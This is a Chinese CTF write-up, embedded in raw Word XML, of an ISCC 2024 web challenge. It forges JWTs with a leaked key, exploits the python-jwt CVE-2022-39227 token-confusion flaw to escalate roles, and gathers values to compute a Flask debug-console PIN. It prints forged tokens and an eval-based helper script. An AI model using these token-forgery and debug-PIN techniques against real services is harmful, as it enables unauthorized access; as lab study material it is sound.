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bookmarkStart w:id="0" w:name="X6f3cd1e00185e6cf9a2026399eeb9e72b9d2b47"/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921125"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="3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16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pin值由六部分计算得来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username：用户名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modname：模块名称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appname：app名称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app.py绝对路径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uuidnode mac：地址的十进制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machine_id 机器码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相信聪明的你一定可以找到上述六部分内容，然后计算出pin值，得到flag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F12看到L2dldHVzZXJuYW1l直接去Base64解码得到 /getusername 然后试着访问一下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64560"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="3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46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491740"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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23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根据刚才的提示，随便输入app.py提示看看得到/crawler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重复username得到username一直给他发：pincalculate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727960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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28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继续访问/crawler ，这是什么？？？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947670"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="4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792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看来只能写个脚本先把他算出来看看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1873885"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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40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928110"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5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81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得到这俩玩意：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&lt;h1&gt;/usr/local/lib/python3.11/site-packages/flask/app.py&lt;/h1&gt;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&lt;h1&gt;uuidnode_mac位于/woddenfish&lt;/h1&gt;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这是个木鱼：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644775"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="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51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F12看看源代码：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 xml:space="preserve">&lt;!DOCTYPE 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html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html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lang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"zh-CN"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head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title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电子木鱼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title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head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style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h1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text-align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center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font-size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26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px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margin-top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: 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75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px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style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h1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当前功德：0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h1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div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style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"display: flex; justify-content: center; align-items: center"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img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src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"../static/木鱼.png"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alt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"木鱼"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style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"max-width: 400px; max-height: 400px; margin-top: 20px;"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div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div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style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"text-align: center; margin-top: 20px"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button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id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"submitBtn"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type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"submit"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敲击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button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div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h1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h1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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="007020"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> style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"display: none;"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ISCC_muyu_2024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p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script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document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getElementById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'submitBtn'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addEventListener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'click'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function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()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var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session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'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiZG9uYXRlIiwicXVhbnRpdHkiOjF9.gT7yG_zYb22iGVXcGtSVzYr-fAeb_Nyv4KbeH3Ez8hc'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var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body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JSON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stringify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session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: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session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})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fetch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'/woddenfish'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,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method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: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'POST'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,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headers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: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   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'Content-Type'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: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'application/json'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}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,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body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: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body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})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then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(response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=&gt;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(response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7D9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ok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return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response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json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}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else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throw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new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Error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'Request failed'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}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})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then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(data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=&gt;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document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querySelector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'h1'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7D9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>textContent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'当前功德：'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+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7D9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>gongde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document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querySelectorAll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'h1'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)[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="40A070"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>1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7D9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>textContent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data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7D9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>message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})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catch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(error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=&gt;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{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    </w:t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console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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="06287E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>error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(error)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    })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    })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script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&lt;/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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="902000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>&gt;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11220"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="5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17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结合下来发现两点：JWT的key：ISCC_muyu_2024，JS代码里有session，可以用"ISCC_muyu_2024"作为密钥，伪造session中donate改为cost伪造一个jwt：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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiY29zdCIsInF1YW50aXR5IjoxMDAwMD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AwMDAwMDAwMDAwMDAwMDB9.9sFdQcxEnWVeSPXvz3YtJs6pDi3iRTs2ITwAX29hrK0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多试几次发包可以看到：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11220"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="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17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\u4f5b\u66f0\uff1a\u529f\u5fb7\u5706\u6ee1\u3002\u5730\u574002:42:ac:18:00:02:,\u673a\u5668\u7801\u63d0\u793a\u7ed9\u4f60\u4e86/machine_id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得到地址：02:42:ac:18:00:02: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和/machine_id，访问后看到点击vip会员奖品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1798320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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985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957195"/>
            <wp:effectExtent l="0" t="0" r="0" b="14605"/>
            <wp:docPr id="6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577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eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ2NTA2ODgsImlhdCI6MTcxNDY0NzA4OCwianRpIjoiS1kwbVludmgxV1FjZmRTaGtuN0xrdyIsIm5iZiI6MTcxNDY0NzA4OCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.m7_YOIJztIHSwwJNCjgwObdS_SR3QgbDUVfhBYTvwyI_bKVo6fyKV6THFq2gofMip22UQoCp6LqbVQgDdMa04bAGmxImLChhoxBIUPO_0dQbmGsaTmxKZtQ5BepSyMA0kIJH3_sLg_KiLBR3TKJ8CkHbZat-1aMYFDfXELbqDnjZfKEDL7mWhD4luounuznmSt9I5fL5_tnSI-BZy_J4sLhok4ittt3fHB4IioChmNK1IUMANuWf9Z0RpYi8ZADCUq5n32Ncn-Bz74SjpZ1_qakxv8Kc1g51okgVBS0bI-Y2xXGfk7cpZOfJEt8UrzZMuLRudqQF3wZQvbYUBnVMfQ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只是一个jwt的token，再看看：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546475"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="7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6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11220"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="7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17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4209415"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="7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097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546475"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="8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6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尝试搜了一下可以用 python-jwt最近的漏洞 CVE-2022-39227：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fldChar w:fldCharType="begin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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/weixin_53090346/article/details/134277438" \h </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>CVE-2022-39227-Python-JWT漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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，先伪造一个JWT(vip权限)伪造成supervip。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546475"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="8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6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928110"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8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281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{"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ2NTA2ODgsImlhdCI6MTcxNDY0NzA4OCwianRpIjoiS1kwbVludmgxV1FjZmRTaGtuN0xrdyIsIm5iZiI6MTcxNDY0NzA4OCwicm9sZSI6InZpcCIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTQ2NTA2ODgsImlhdCI6MTcxNDY0NzA4OCwianRpIjoiS1kwbVludmgxV1FjZmRTaGtuN0xrdyIsIm5iZiI6MTcxNDY0NzA4OCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9","signature":"m7_YOIJztIHSwwJNCjgwObdS_SR3QgbDUVfhBYTvwyI_bKVo6fyKV6THFq2gofMip22UQoCp6LqbVQgDdMa04bAGmxImLChhoxBIUPO_0dQbmGsaTmxKZtQ5BepSyMA0kIJH3_sLg_KiLBR3TKJ8CkHbZat-1aMYFDfXELbqDnjZfKEDL7mWhD4luounuznmSt9I5fL5_tnSI-BZy_J4sLhok4ittt3fHB4IioChmNK1IUMANuWf9Z0RpYi8ZADCUq5n32Ncn-Bz74SjpZ1_qakxv8Kc1g51okgVBS0bI-Y2xXGfk7cpZOfJEt8UrzZMuLRudqQF3wZQvbYUBnVMfQ"}</w:t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直接传入token（URL编码下）
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/machine_id/vipprice?token={"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ2NTA2ODgsImlhdCI6MTcxNDY0NzA4OCwianRpIjoiS1kwbVludmgxV1FjZmRTaGtuN0xrdyIsIm5iZiI6MTcxNDY0NzA4OCwicm9sZSI6InZpcCIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTQ2NTA2ODgsImlhdCI6MTcxNDY0NzA4OCwianRpIjoiS1kwbVludmgxV1FjZmRTaGtuN0xrdyIsIm5iZiI6MTcxNDY0NzA4OCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9","signature":"m7_YOIJztIHSwwJNCjgwObdS_SR3QgbDUVfhBYTvwyI_bKVo6fyKV6THFq2gofMip22UQoCp6LqbVQgDdMa04bAGmxImLChhoxBIUPO_0dQbmGsaTmxKZtQ5BepSyMA0kIJH3_sLg_KiLBR3TKJ8CkHbZat-1aMYFDfXELbqDnjZfKEDL7mWhD4luounuznmSt9I5fL5_tnSI-BZy_J4sLhok4ittt3fHB4IioChmNK1IUMANuWf9Z0RpYi8ZADCUq5n32Ncn-Bz74SjpZ1_qakxv8Kc1g51okgVBS0bI-Y2xXGfk7cpZOfJEt8UrzZMuLRudqQF3wZQvbYUBnVMfQ"}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就可以拿到一个session，实际就是：jwt密钥welcome_to_iscc_club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接着再伪造一个jwt为supervip，就会拿到machine_id为acff8a1c-6825-4b9b-b8e1-8983ce1a8b94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然后把mac地址转换一下，接着算pin码，⽹上找一个脚本，然后访问/console输入就可以拿到flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="180"/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914140"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="9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147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import requests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fetch_and_calculate(url):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        response = requests.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        response.raise_for_status()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        expression = response.json()['expression']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        expression = expression.replace("×", "*").replace("÷", "/")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = eval(expression)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(result)</w:t>
      </w:r>
    </w:p>
    <w:p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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    except requests.RequestException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print(f"Error with request: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    except SyntaxError as e:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"Syntax error in the expression: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"An error occurred: {e}")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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    url = "http://101.200.138.180:10006/get_expression"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    answer = fetch_and_calculate(url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if answer is not None:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        answer_url = f"http://101.200.138.180:10006/crawler?answer={answer}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(requests.get(answer_url).text)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31D251AB"/>
    <w:rsid w:val="48E8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autoRedefine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2024-05-04T13:40:30Z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